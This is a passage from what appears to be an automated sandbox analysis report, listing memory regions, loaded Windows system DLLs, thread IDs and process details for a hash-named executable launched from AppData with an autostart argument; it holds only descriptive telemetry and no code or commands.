"\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 1487 start_va = 0x7fefa8e0000 end_va = 0x7fefa8f4fff monitored = 0 entry_point = 0x7fefa8e60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1488 start_va = 0x7fefa9d0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefa9d10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1489 start_va = 0x7fefab00000 end_va = 0x7fefab2ffff monitored = 0 entry_point = 0x7fefab1fe98 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 1490 start_va = 0x7fefab30000 end_va = 0x7fefabdbfff monitored = 0 entry_point = 0x7fefab418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 1491 start_va = 0x7fefac00000 end_va = 0x7fefac08fff monitored = 0 entry_point = 0x7fefac01010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1492 start_va = 0x7fefac10000 end_va = 0x7fefac3bfff monitored = 0 entry_point = 0x7fefac115c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1493 start_va = 0x7fefac40000 end_va = 0x7fefacebfff monitored = 0 entry_point = 0x7fefac56acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1494 start_va = 0x7fefacf0000 end_va = 0x7fefad1cfff monitored = 0 entry_point = 0x7fefacf1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1495 start_va = 0x7fefad20000 end_va = 0x7fefad30fff monitored = 0 entry_point = 0x7fefad214c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1496 start_va = 0x7fefad60000 end_va = 0x7fefad9efff monitored = 0 entry_point = 0x7fefad612c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1497 start_va = 0x7fefaff0000 end_va = 0x7fefb000fff monitored = 0 entry_point = 0x7fefaff1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1498 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1499 start_va = 0x7fefb1b0000 end_va = 0x7fefb1fafff monitored = 0 entry_point = 0x7fefb1befcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1500 start_va = 0x7fefb620000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb6294bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1501 start_va = 0x7fefb7a0000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb92c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1502 start_va = 0x7fefbe30000 end_va = 0x7fefbe3bfff monitored = 0 entry_point = 0x7fefbe31064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1503 start_va = 0x7fefbff0000 end_va = 0x7fefc00afff monitored = 0 entry_point = 0x7fefbff2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1504 start_va = 0x7fefc010000 end_va = 0x7fefc02dfff monitored = 0 entry_point = 0x7fefc0113b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1505 start_va = 0x7fefc030000 end_va = 0x7fefc041fff monitored = 0 entry_point = 0x7fefc031060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1506 start_va = 0x7fefc160000 end_va = 0x7fefc169fff monitored = 0 entry_point = 0x7fefc163cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1507 start_va = 0x7fefc170000 end_va = 0x7fefc17cfff monitored = 0 entry_point = 0x7fefc171348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1508 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1509 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1510 start_va = 0x7fefc6d0000 end_va = 0x7fefc6f1fff monitored = 0 entry_point = 0x7fefc6d5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1511 start_va = 0x7fefc750000 end_va = 0x7fefc77efff monitored = 0 entry_point = 0x7fefc751064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1512 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1513 start_va = 0x7fefcb00000 end_va = 0x7fefcb0afff monitored = 0 entry_point = 0x7fefcb01030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1514 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1515 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1516 start_va = 0x7fefcc10000 end_va = 0x7fefcc4cfff monitored = 0 entry_point = 0x7fefcc118f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1517 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1518 start_va = 0x7fefcc70000 end_va = 0x7fefcc7efff monitored = 0 entry_point = 0x7fefcc719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1519 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd11020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1520 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1521 start_va = 0x7fefcd90000 end_va = 0x7fefcefcfff monitored = 0 entry_point = 0x7fefcd910b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1522 start_va = 0x7fefcf00000 end_va = 0x7fefcf35fff monitored = 0 entry_point = 0x7fefcf01474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1523 start_va = 0x7fefcf40000 end_va = 0x7fefcf59fff monitored = 0 entry_point = 0x7fefcf41558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1524 start_va = 0x7fefd000000 end_va = 0x7fefd03afff monitored = 0 entry_point = 0x7fefd001324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1525 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1526 start_va = 0x7fefd490000 end_va = 0x7fefd4dcfff monitored = 0 entry_point = 0x7fefd491070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1527 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1528 start_va = 0x7fefd6f0000 end_va = 0x7fefe477fff monitored = 0 entry_point = 0x7fefd76cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1529 start_va = 0x7fefe480000 end_va = 0x7fefe656fff monitored = 0 entry_point = 0x7fefe481010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1530 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1531 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1532 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1533 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1534 start_va = 0x7fefea60000 end_va = 0x7fefeab1fff monitored = 0 entry_point = 0x7fefea610d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1535 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1536 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1537 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1538 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1539 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1540 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1541 start_va = 0x7fefeff0000 end_va = 0x7fefeff7fff monitored = 0 entry_point = 0x7fefeff1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1542 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1543 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1544 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1545 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1546 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1547 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1548 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1549 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1550 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1551 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1552 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1553 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1554 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1555 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1556 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1557 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1558 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1559 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1560 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1561 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1562 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1563 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1564 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1565 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 78 os_tid = 0xfc0 Thread: id = 79 os_tid = 0x25c Thread: id = 80 os_tid = 0x1d8 Thread: id = 81 os_tid = 0x5a0 Thread: id = 82 os_tid = 0x114 Thread: id = 83 os_tid = 0x680 Thread: id = 84 os_tid = 0x5c8 Thread: id = 85 os_tid = 0x1c4 Thread: id = 86 os_tid = 0xf8 Thread: id = 87 os_tid = 0x3e8 Thread: id = 88 os_tid = 0x3dc Thread: id = 89 os_tid = 0x3d8 Thread: id = 90 os_tid = 0x3c8 Thread: id = 91 os_tid = 0x3c4 Thread: id = 92 os_tid = 0x390 Thread: id = 93 os_tid = 0x380 Thread: id = 94 os_tid = 0x378 Thread: id = 95 os_tid = 0x360 Thread: id = 96 os_tid = 0x348 Thread: id = 97 os_tid = 0x338 Thread: id = 104 os_tid = 0xb30 Process: id = "11" image_name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" page_root = "0x10ae6000" os_pid = "0x768" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x6f8" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f504" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1696 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1697 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1698 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1699 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1700 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1701 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1702 start_va = 0x400000 end_va = 0x253dfff monitored = 1 entry_point = 0x4984b0 region_type = mapped_file name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") Region: id = 1703 start_va = 0x76dc0000 end_va = 0x76f68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1704 start_va = 0x76fa0000 end_va = 0x7711ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1705 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1706 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1707 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1708 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1709 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1710 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1711 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1848 start_va = 0x1a0000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1849 start_va = 0x73730000 end_va = 0x7376efff monitored = 0 entry_point = 0x7375e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1850 start_va = 0x736d0000 end_va = 0x7372bfff monitored = 0 entry_point = 0x7370f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1851 start_va = 0x736c0000 end_va = 0x736c7fff monitored = 0 entry_point = 0x736c20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1852 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 0 entry_point = 0x76cb5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1853 start_va = 0x76600000 end_va = 0x7670ffff monitored = 0 entry_point = 0x76613283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1854 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 0 entry_point = 0x76cb5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1855 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076ca0000" filename = "" Region: id = 1856 start_va = 0x76ba0000 end_va = 0x76c99fff monitored = 0 entry_point = 0x76bba2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1857 start_va = 0x76ba0000 end_va = 0x76c99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076ba0000" filename = "" Region: id = 1858 start_va = 0x2540000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1859 start_va = 0x76600000 end_va = 0x7670ffff monitored = 0 entry_point = 0x76613283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1860 start_va = 0x74f50000 end_va = 0x74f96fff monitored = 0 entry_point = 0x74f574c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1861 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1862 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1863 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1864 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1865 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1866 start_va = 0x74e50000 end_va = 0x74f4ffff monitored = 0 entry_point = 0x74e6b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1867 start_va = 0x75910000 end_va = 0x7599ffff monitored = 0 entry_point = 0x75926343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1868 start_va = 0x76f70000 end_va = 0x76f79fff monitored = 0 entry_point = 0x76f736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1869 start_va = 0x756b0000 end_va = 0x7574cfff monitored = 0 entry_point = 0x756e3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1870 start_va = 0x74fa0000 end_va = 0x7504bfff monitored = 0 entry_point = 0x74faa472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1871 start_va = 0x75610000 end_va = 0x756affff monitored = 0 entry_point = 0x756249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1872 start_va = 0x75050000 end_va = 0x75068fff monitored = 0 entry_point = 0x75054975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1873 start_va = 0x75100000 end_va = 0x751effff monitored = 0 entry_point = 0x75110569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1874 start_va = 0x74af0000 end_va = 